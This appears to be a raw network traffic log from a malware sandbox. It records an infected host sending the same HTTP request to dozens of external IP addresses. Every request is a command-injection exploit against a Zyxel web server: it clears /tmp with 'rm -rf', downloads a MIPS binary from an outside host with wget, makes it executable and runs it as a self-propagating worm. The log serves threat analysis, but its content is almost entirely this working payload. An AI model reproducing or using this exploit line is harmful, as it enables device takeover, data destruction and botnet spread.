                                        Mar 31, 2024 09:22:44.883687973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9185192.168.2.2342936146.127.27.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883738995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9186192.168.2.2354062196.115.151.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883775949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9187192.168.2.233742088.161.35.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883810997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9188192.168.2.2358922218.254.64.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883865118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9189192.168.2.2356664121.247.153.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883905888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9190192.168.2.234324427.137.79.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883935928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9191192.168.2.2337848161.229.178.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.883980989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9192192.168.2.2339830168.127.102.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884020090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9193192.168.2.235265638.159.180.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884073019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9194192.168.2.234321066.88.228.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884121895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9195192.168.2.234923272.204.196.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884150982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9196192.168.2.2354174222.146.120.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884207010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9197192.168.2.234281019.208.57.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884249926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9198192.168.2.233803845.135.117.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884311914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9199192.168.2.2337684151.87.99.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884337902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9200192.168.2.2359208132.64.28.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884399891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9201192.168.2.2341596173.206.226.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884449959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9202192.168.2.235978417.27.80.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884500027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9203192.168.2.235917632.182.90.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884531975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9204192.168.2.2349998118.194.226.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884603024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9205192.168.2.2345212213.18.124.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884640932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9206192.168.2.2360434114.170.130.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884700060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9207192.168.2.236099041.212.60.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884748936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9208192.168.2.2359242204.211.248.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884799004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9209192.168.2.2359898211.67.186.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884851933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9210192.168.2.233825457.172.27.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884903908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9211192.168.2.235966659.147.93.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884946108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9212192.168.2.2342654203.28.194.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.884994030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9213192.168.2.2360380138.40.18.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885042906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9214192.168.2.235510049.6.164.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885082006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9215192.168.2.2350434184.180.41.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885139942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9216192.168.2.2333096159.14.245.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885185957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9217192.168.2.234934288.153.7.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885231018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9218192.168.2.2347226100.187.53.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885261059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9219192.168.2.2344926173.41.246.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885318995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9220192.168.2.2358012153.122.217.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885366917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9221192.168.2.2348108195.207.87.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885412931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9222192.168.2.234328070.31.235.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885457039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9223192.168.2.23552085.186.60.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885497093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9224192.168.2.2343508190.153.61.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885540962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9225192.168.2.233637214.225.80.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885576010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9226192.168.2.2342464195.213.94.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885637999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9227192.168.2.234111690.214.52.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885684967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9228192.168.2.235609494.190.57.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885730982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9229192.168.2.234734664.82.142.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885786057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9230192.168.2.233474220.199.175.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885838032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9231192.168.2.2352152159.39.168.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885875940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9232192.168.2.233419668.110.53.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885926962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9233192.168.2.233591293.7.37.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.885956049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9234192.168.2.2358806177.170.43.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886018991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9235192.168.2.234509299.172.76.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886053085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9236192.168.2.234307254.53.137.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886096954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9237192.168.2.2345204168.34.87.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886145115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9238192.168.2.2334046196.126.231.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886197090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9239192.168.2.235145672.142.89.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886246920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9240192.168.2.235621820.2.126.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886298895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9241192.168.2.2347798123.116.110.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886343002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9242192.168.2.2335828145.195.163.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886394024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9243192.168.2.234171460.2.32.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886430979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9244192.168.2.2350976139.103.165.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886466980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9245192.168.2.233901461.12.245.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886513948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9246192.168.2.2336220102.65.204.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886568069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9247192.168.2.2346578210.106.64.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886605978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9248192.168.2.234448838.184.210.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886668921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9249192.168.2.234176438.149.218.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886719942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9250192.168.2.2348028168.34.212.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886759043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9251192.168.2.2343284213.88.217.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:44.886792898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9252192.168.2.2345188200.39.187.172443
                                        TimestampBytes transferredDirectionData
